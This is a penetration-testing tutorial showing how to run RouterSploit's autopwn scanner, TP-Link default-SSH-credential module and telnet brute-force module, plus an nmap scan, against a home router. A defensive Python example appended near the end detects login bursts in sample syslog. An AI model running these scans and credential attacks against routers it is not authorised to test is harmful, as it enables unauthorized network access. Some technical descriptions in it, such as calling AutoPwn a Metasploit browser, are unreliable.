Router Pentesting Using RouterSploit | Network Penetration Test


In this article, we will demonstrate how to use the RouterSploit framework to find vulnerabilities in a router. The RouterSploit Framework is an open-source exploitation framework used for penetration testing of routers, also called router pen-testing. It consists of various modules that perform router penetration testing operations: exploits, credentials, scanners, payloads and generic.

The RouterSploit framework has three main modules:

  • Exploiting module: It contains all the publicly available exploits.
  • Creds Module: Used for testing logins for different devices.
  • Scanner Modules: Check particular exploits against a specific device.

NOTE: RouterSploit is not an official Kali Linux tool.

Let’s see how to scan and exploit our router. Let’s move on to Kali Linux and get the framework from GitHub. Open the terminal in Kali Linux and download RouterSploit. Before that, change the directory to the desktop for easy navigation as follows:

root@kali:~# cd Desktop

Since it’s case sensitive, make sure to spell it properly. Here, the cd command is used to change the directory.

Now, once you’re in the Desktop directory, type the command below in the terminal to download the RouterSploit Framework.

root@kali:~/Desktop# git clone https://github.com/threat9/routersploit

Now, you’ll see that the framework is cloned to the desktop. Before running the framework you need Python installed as a prerequisite, because the framework is developed in the Python programming language. Type the following command to install it:

root@kali:~/Desktop# apt-get install python3-pip

Now change your directory to the routersploit folder:

root@kali:~/Desktop# cd routersploit

Now, install some of the dependencies of RouterSploit framework as below:

root@kali:~/Desktop/routersploit# python3 -m pip install -r requirements.txt

Here,

  • -m runs a library module as a script
  • pip is the tool for installing and managing Python packages
  • -r installs from the given requirements file.

So, the command installs the dependencies listed in the requirements file. If you’re doing this for the first time you may get a different output than mine.

Now, it’s time to run the RouterSploit framework. Type the command:

root@kali:~/Desktop/routersploit# python3 rsf.py

Here, we’re executing the python program which is inside the desktop in routersploit directory. Now, we’re in the rsf console. Type show all and hit enter.

You will see all the modules of RouterSploit. Now type:

rsf > search autopwn

AutoPwn is a Metasploit browser that is used to test browser vulnerabilities. You can see it’s under the scanners. So let’s use it:

rsf > use scanners/autopwn

Now type show options to see all available options:

rsf (AutoPwn) > show options

Here you can see two options:

  • Target option and
  • Module options.

Now set the threads to 30 for quick performance.

rsf (AutoPwn) > set threads 30

Now, set the target router IP. If you don’t know the IP, click new terminal or ctrl+shift key to open a new terminal in the Kali box.

Type ifconfig to see the IP address or, alternatively, type ip r and hit enter. From here you can see the router IP. Usually, the router IP tends to be the first IP, that is, 192.168.0.1.

Now go to rsf console and set target ip as

rsf (AutoPwn) > set target 192.168.0.1

Now run the vulnerability scan:

rsf (AutoPwn) > run

The scan is complete but no vulnerability is found.

So what do we do next?

Using ssh default credentials for finding a script

Let’s go back to the rsf console from autopwn

rsf (AutoPwn) > back

Search for exploits, credentials or anything else that is available for my router brand, i.e. TP-Link:

rsf > search tplink

Run ssh default credentials for finding a script.


Now type use…copy and paste the script and hit enter.

rsf > use creds/routers/tplink/ssh_default_creds

rsf (TP-Link Router Default SSH Creds) > show options

Now all the options are displayed. This time set the threads to 10 and set the target IP address:

rsf (TP-Link Router Default SSH Creds) > set threads 10

rsf (TP-Link Router Default SSH Creds) > set target 192.168.0.1

Finally, run the exploit:

rsf (TP-Link Router Default SSH Creds) > run

You see the default login credentials of the target router. The login username is admin and the password is also admin.

Now, in the second terminal let’s try to access using ssh as

root@kali:~/Desktop/routersploit# ssh admin@192.168.0.1

Enter the password as admin.

You see that the router credentials are correct but we couldn’t log into the router via ssh due to various reasons.

The router is unable to provide its console. However, the vulnerability assessment and exploitation technique with the framework is the same for all routers.

Using Nmap code scan in RouterSploit

Now, go to the second terminal window and perform an Nmap code scan against the router to find out whether the STD port is open so that we can log in from our browser.

root@kali:~/Desktop/routersploit# nmap -sS 192.168.0.1

So we can see that STD port is open so let’s try to login via browser.

Type in terminal

root@kali:~/Desktop/routersploit# firefox 192.168.0.1

Now, the router page is open. Enter the desired credentials and click on the login button. You’ll be able to log in to the router successfully.

Using Creds Module in RouterSploit

Now, let’s talk about the creds module in RouterSploit, which is generally used for testing combinations of default passwords through a dictionary attack.

use creds/telnet_bruteforce

After typing the above command, follow the previous steps: look for the available options by typing “show options”, then set the target as above by typing “set target ” and, in the end, run the exploit.
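From the router's side, the threaded login testing done by the creds modules above shows up as a burst of failed logins from one source. The following Python detection example is added here and is not part of the original article or of RouterSploit; the dropbear-style syslog lines are constructed, and the year, threshold and window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: dropbear-style SSH auth lines as a router might send to syslog.
SAMPLE_LOG = """\
Jan 12 10:15:01 router dropbear[811]: Bad password attempt for 'admin' from 192.168.0.105:40112
Jan 12 10:15:01 router dropbear[812]: Bad password attempt for 'admin' from 192.168.0.105:40114
Jan 12 10:15:02 router dropbear[813]: Bad password attempt for 'root' from 192.168.0.105:40118
Jan 12 10:15:02 router dropbear[814]: Bad password attempt for 'admin' from 192.168.0.105:40120
Jan 12 10:15:03 router dropbear[815]: Bad password attempt for 'support' from 192.168.0.105:40126
Jan 12 10:15:03 router dropbear[816]: Bad password attempt for 'admin' from 192.168.0.105:40130
Jan 12 10:15:04 router dropbear[817]: Password auth succeeded for 'admin' from 192.168.0.105:40134
Jan 12 10:18:40 router dnsmasq-dhcp[402]: DHCPACK(br0) 192.168.0.20 laptop
Jan 12 10:20:10 router dropbear[830]: Bad password attempt for 'admin' from 192.168.0.20:51844
Jan 12 10:20:25 router dropbear[831]: Password auth succeeded for 'admin' from 192.168.0.20:51850
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ dropbear\[\d+\]: "
    r"(?P<event>Bad password attempt|Password auth succeeded) for "
    r"'(?P<user>[^']*)' from (?P<ip>[\d.]+):\d+$")

def parse(log, year=2024):
    """Return sorted (time, ip, user, success) tuples; syslog has no year, so one is assumed."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line.strip())
        if m:  # non-auth lines (e.g. DHCP) are skipped
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["ip"], m["user"], m["event"].startswith("Password")))
    return sorted(events)

def detect(events, max_failures=5, window=timedelta(seconds=60)):
    """Flag sources with >= max_failures bad passwords inside window, and a login that follows."""
    recent, alerts = defaultdict(list), {}
    for ts, ip, user, ok in events:
        recent[ip] = [t for t in recent[ip] if ts - t <= window]  # slide the window
        if not ok:
            recent[ip].append(ts)
            if len(recent[ip]) >= max_failures:
                alert = alerts.setdefault(ip, {"failures": 0, "success_after_burst": None})
                alert["failures"] = max(alert["failures"], len(recent[ip]))
        elif ip in alerts and recent[ip]:
            alerts[ip]["success_after_burst"] = user  # guessing ended in a valid login
    return alerts

if __name__ == "__main__":
    print(detect(parse(SAMPLE_LOG)))
```

A single mistyped password followed by a successful login, as from 192.168.0.20 in the sample, stays below the threshold and is not flagged.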


So, now you know how to use three modules of the RouterSploit.

Note: This article is solely for knowledge purpose. Any misuse of this article is strongly discouraged by us.